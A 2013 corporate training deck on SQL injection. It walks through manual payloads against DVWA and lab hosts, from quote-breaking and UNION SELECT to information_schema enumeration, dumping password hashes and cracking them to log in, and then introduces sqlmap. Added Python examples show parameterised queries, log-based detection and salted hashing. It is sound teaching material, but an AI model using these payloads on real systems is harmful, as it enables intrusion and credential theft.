
SQL Injection using manual and automated techniques (sqlmap)

Nik Roby 8 October 2013 nroby@keywcorp.com


KEYW Corporation 7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076 T: 443.733.1600 cybertraining@keywcorp.com training.keywcorp.com

What is SQL Injection?


SQL injection (SQLi) is the injection of malicious SQL statements into web application queries. It results in additional data being displayed in the web page's response, and is commonly used to extract usernames and passwords.


SQL Injection attack type

[Diagram: a malicious host injects commands into the web application; the web/DB server returns data to it.]


Database backed web applications

Web applications like WordPress, Joomla, MS SharePoint and Drupal all have a database that helps generate web pages. A database is essentially a collection of many related spreadsheets with columns and rows. SQL is the most common language used to talk to a database.

SQL DATABASE
Users Table: id, password, username
Blog Entries: id, blog_post
Products Table: id, name, description


SQL Basics

SELECT: extracts data from a table
SELECT username, phone_number FROM users WHERE username='Bob';

INSERT INTO: adds a new row of data
INSERT INTO users (username, password) VALUES ('frank', 'easy');

UPDATE: changes data of an existing record
UPDATE users SET username='awesomesauce' WHERE username='Bob';


SQL Basics (continued)

DELETE: removes a record from a table
DELETE FROM users WHERE username='Bob';

UNION: combines two SELECT statements
SELECT first_name, last_name FROM users WHERE id=1 UNION SELECT first_name, email FROM users WHERE 'a'='a';

Comments: #, --, /*comment*/
Comment syntax is used to close/balance SQL queries (everything after the comment marker is ignored by the database); it is also used to assist in malicious SQL statements.


SQL Attack Process

1. Map the application to find vectors
2. Solicit an error (break it)
3. Determine the number of columns
4. Extract table names
5. Extract column names
6. Extract the data


What can an SQL Injection do?

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can:
1. Read sensitive data from the database
2. Modify database data (Insert/Update/Delete)
3. Execute administration operations on the database (such as shutting down MySQL)
4. Read the content of a given file present on the DBMS file system
5. In some cases, issue commands to the operating system


Let's do a manual SQL Injection!


Class SQL Workshop

[Screenshot: login form with a password field]


SQL Injection: First Step

The website requires user input or performs some dynamic querying. The attacker will need to map the web application to find potential vectors.
For SQLi we will be using the DVWA SQL injection example, with security set to low.

Try to identify the web server software and the database backend.


Set Security to low

1. Click on DVWA Security

2. Select low

3. Click Submit


Applying SQL Injection: Second Step

The page takes user input: a numerical ID returns information. We can reason that the query looks similar to:
SELECT <first_name>, <surname> FROM <table_name> WHERE <id>='<input_value>';

The number of columns is unknown, but at least two are implied.


Applying SQL Injection: Find the Injection

We need to break the SQL statement to determine if the app is vulnerable to SQLi. A single (') or double (") quote may work, and results in a syntax error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1


SQL Injection: Find the Injectable Piece

Knowing that we can break the statement, we can attempt injection. We can extract data by providing a test that is always true:
' or 1='1

What it looks like to the database:

SELECT first_name, last_name FROM users WHERE user_id='' or 1='1';
Does user_id = '' or does 1='1'? The second condition holds for every row, so every row is returned.

We now have a viable SQLi vector!
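The query shape reasoned about in the second step, the quote that breaks it, and the always-true test above can all be reproduced offline. The following Python example is added here and is not part of the original deck: it models a DVWA-style users table in an in-memory SQLite database (constructed sample rows), runs the concatenated query the deck reasons about beside a parameterised one, and reports what each returns for a normal ID, a lone quote and a tautology. SQLite does not coerce the bare integer in 1='1' the way MySQL does, so the always-true test here uses the quoted form 'a'='a' from the UNION example on the SQL Basics slide. The table contents, function names and column names are assumptions made for the example.

```python
import sqlite3

# Constructed sample data modelled on the DVWA "users" table discussed in the
# deck (hypothetical rows, not the real DVWA seed data).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]


def build_db():
    """Create an in-memory SQLite database holding the sample users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_input):
    """The pattern the deck reasons about: the raw input is pasted into the SQL.

    Returns the matching rows, or the database's own error message as a string.
    Echoing that message to the client is the oracle the 'break it' step uses."""
    query = (
        "SELECT first_name, last_name FROM users WHERE user_id='"
        + user_input
        + "'"
    )
    try:
        return conn.execute(query).fetchall()
    except sqlite3.OperationalError as err:
        return "DB error: " + str(err)


def safe_lookup(conn, user_input):
    """Hardened form: the input is a bound parameter, never SQL text.

    A quote or a tautology is then just a string value that matches no row."""
    query = "SELECT first_name, last_name FROM users WHERE user_id=?"
    return conn.execute(query, (user_input,)).fetchall()


def compare(user_input):
    """Run both versions on the same input and summarise the difference."""
    conn = build_db()
    vuln = vulnerable_lookup(conn, user_input)
    safe = safe_lookup(conn, user_input)
    conn.close()
    return {
        "input": user_input,
        "vulnerable_rows": len(vuln) if isinstance(vuln, list) else None,
        "vulnerable_error": vuln if isinstance(vuln, str) else None,
        "safe_rows": len(safe),
    }


if __name__ == "__main__":
    for probe in ("1", "'", "' or 'a'='a"):
        print(compare(probe))
```

With a normal ID both versions return one row. With a lone quote the concatenated version raises a syntax error (the SQLite equivalent of the MySQL message on the previous slide) while the parameterised one simply returns nothing; with the tautology the concatenated version returns all five rows and the parameterised one still returns nothing. Catching the database exception and returning a generic message removes the error oracle; binding the parameter removes the injection itself.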


SQL Injection: Determine Column Count

Our vector is based on a SELECT statement, so we will UNION it with our injected statement. The two SELECT statements must match in column number and type.

ORDER BY <number_of_columns>:
ORDER BY 1#

Null column enumeration:
UNION SELECT 1 #
UNION SELECT 1, 2 #
UNION SELECT 1, 2, 3 #
UNION SELECT 1, 2, 3, 4 #

SQL Injection: Database Enumeration

Determine the database type and version:
UNION SELECT 1, @@version #

Note: this is a MySQL-specific command; if it were another database such as MSSQL, it would have failed. SQL differs between database types and versions.
Full statement (everything after the # is treated as a comment):
SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT 1, @@version #' "


SQL Injection: Extracting Data

The database contains many tables, each like a spreadsheet. They often link to each other. Find the table that looks like it contains valuable data.

SQL DATABASE
users Table: id, password, username
VIEWS Table: id, usr
columns_priv Table: id, db, host


Applying SQL Injection: Fifth Step

Extract table names from the database:
UNION SELECT table_name, null FROM information_schema.tables WHERE 1=1


SQL Injection: Extract Column Names

Extract column names:
UNION SELECT column_name, null FROM information_schema.columns WHERE table_name = 'users'

Note the quoting of the table name: table_name = 'users'

Returned column names: user_id, password, avatar, first_name, last_name, user


SQL Injection: Extract the Data

Extract the data:
UNION SELECT user, password FROM users WHERE 1=1

Result (the users table; password values truncated on the slide):
id  user     avatar             password
1   admin    http://192.168...  ...
2   gordonb  http://192.168...  ...
3   1337     http://192.168...  ...
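Each of the manual steps above leaves a distinctive footprint in the web server's access log: a lone quote, the always-true test, ORDER BY and UNION SELECT probes, and @@version or information_schema lookups. The following Python example is added here and is not part of the original deck: it parses a few constructed Apache-style log lines, URL-decodes every query-string value, and reports which of those footprints appears in which request, so a defender can see the whole chain from one source address. The log lines, rule names and regular expressions are assumptions made for the example; matching like this is a triage aid for the access log, not a substitute for parameterised queries.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (simplified Apache format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Oct/2013:10:01:02 -0400] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1432
10.0.0.7 - - [08/Oct/2013:10:01:09 -0400] "GET /dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit HTTP/1.1" 200 1510
10.0.0.7 - - [08/Oct/2013:10:01:15 -0400] "GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D%271&Submit=Submit HTTP/1.1" 200 2980
10.0.0.7 - - [08/Oct/2013:10:01:40 -0400] "GET /dvwa/vulnerabilities/sqli/?id=%27+UNION+SELECT+1%2C+%40%40version+%23&Submit=Submit HTTP/1.1" 200 1601
10.0.0.7 - - [08/Oct/2013:10:02:03 -0400] "GET /dvwa/vulnerabilities/sqli/?id=%27+UNION+SELECT+table_name%2C+null+FROM+information_schema.tables+WHERE+1%3D1+%23&Submit=Submit HTTP/1.1" 200 4012
10.0.0.9 - - [08/Oct/2013:10:02:30 -0400] "GET /announcement.php?a_id=42 HTTP/1.1" 200 988
"""

# One regex for the log line itself: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)$'
)

# Footprints of the manual steps, matched against the *decoded* parameter value.
RULES = [
    ("lone_quote", re.compile(r"^['\"]$")),
    ("tautology", re.compile(r"['\"]\s*or\s+\S+\s*=\s*\S+", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("version_probe", re.compile(r"@@version\b")),
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),
]


def classify_value(value):
    """Return the names of every rule the decoded value trips, in RULES order."""
    return [name for name, pattern in RULES if pattern.search(value)]


def scan_log(text):
    """Parse the log and return one event per parameter value that trips a rule."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        query = urlsplit(m.group("target")).query
        # parse_qsl undoes both %xx escapes and '+' for space, so the rules
        # see the value the application saw.
        for name, value in parse_qsl(query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                events.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "param": name,
                    "value": value,
                    "rules": hits,
                })
    return events


if __name__ == "__main__":
    for ev in scan_log(SAMPLE_LOG):
        print(ev["ip"], ev["param"], ev["rules"], repr(ev["value"]))
```

Run against the sample, the benign requests produce nothing and the four probes from 10.0.0.7 are tagged lone_quote, tautology, union_select plus version_probe, and union_select plus schema_enum, in that order. Decoding before matching matters: the raw log shows only %27 and %40%40, which none of the rules would recognise.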


Google or Crack the hashes: admin

5f4dcc3b5aa765d61d8327deb882cf99 is the MD5 hash of the word: password


Google or Crack the hashes: gordonb

e99a18c428cb38d5f260853678922e03 is the MD5 hash of the word: abc123

I can now log into DVWA with the username gordonb and the password abc123!
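The two hash lookups above work because the application stores unsalted MD5: the same word always produces the same digest, so one public table answers for every user. The following Python example is added here and is not part of the original deck: it reproduces the lookup against a constructed five-word list using the two digests quoted on the admin and gordonb slides, then shows the storage scheme that defeats such lookups, a random per-user salt with PBKDF2-SHA256 and a constant-time comparison. The wordlist, the stored-record format and the iteration count are assumptions made for the example.

```python
import hashlib
import hmac
import os

# Digests quoted on the deck's slides (MD5 of "password" and of "abc123").
DECK_HASHES = {
    "admin": "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
}

# Constructed mini wordlist standing in for the "Google it" lookup.
WORDLIST = ["123456", "password", "letmein", "abc123", "qwerty"]


def md5_hex(word):
    """Unsalted MD5 as stored by the application in the walkthrough."""
    return hashlib.md5(word.encode()).hexdigest()


def lookup_unsalted_md5(hash_hex, wordlist=WORDLIST):
    """Why unsalted MD5 fails: one precomputed table answers for every user."""
    for word in wordlist:
        if md5_hex(word) == hash_hex:
            return word
    return None


def hash_password(password, salt=None, iterations=200_000):
    """Store as salt$iterations$derived_key (all hex); salt is random per user.

    Two users with the same password get different records, so a lookup
    table built for one record says nothing about any other."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "{}${}${}".format(salt.hex(), iterations, dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, iters, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for user, digest in DECK_HASHES.items():
        print(user, "->", lookup_unsalted_md5(digest))
    record = hash_password("abc123")
    print(record)
    print(verify_password("abc123", record), verify_password("abc124", record))
```

Both deck digests resolve immediately against a five-word list, which is exactly what the online lookup did. The salted records cannot be resolved that way: the same password hashed twice yields two different records, and only the stored salt plus a full PBKDF2 run per guess can check a candidate.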

Let's try SQL injection on another site! Go to: http://11.22.33.12


Web Site Database Exploits


Find the vulnerable parameter

http://172.16.35.12/announcement.php?a_id=' or 1='1


Perform a UNION SELECT to get users

http://172.16.35.12/announcement.php?a_id=' UNION SELECT null, username, null, powercontrol FROM users WHERE 1='1


Perform a UNION SELECT to get users

http://172.16.35.13/announcement.php?a_id=' UNION SELECT null, username, null, passwordhash FROM users WHERE 1='1


Find the hash online

Username: jlilley Password: jellybean


Log in with cracked credentials

Username: jlilley
Password: jellybean


Make it easy for me: sqlmap



sqlmap

Python script to perform automated SQL injections and extract data.
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.


sqlmap

Developers: Bernardo Damele A. G. (@inquisb), Miroslav Stampar (@stamparm)

Website: sqlmap.org


Sqlmap: wizard mode for beginners

Wizard mode is a way to introduce you to using sqlmap. You need to supply a cookie for some kinds of website attacks (POST).


Sqlmap wizard


Sqlmap: wizard results

The discovered DB is MySQL. It shows a number of SQL injections on the id parameter.


Sqlmap: Crack and extract passwords


Work on your own

Try it on your own on www.crazychinchilla.com


Questions?


www.keywcorp.com/cybersessions

October Events:
Recovering Deleted USB files, 10 October 2013 (Thursday)
Web Application Attacks, 15 October 2013 (Tuesday)
Wi-Fi Hacking and Honeypots, 17 October 2013 (Thursday)
Recovering Deleted USB files, 22 October 2013 (Tuesday)
Metasploit Crash Course, 24 October 2013 (Thursday)
Mobile Phone Security, 29 October 2013 (Tuesday)
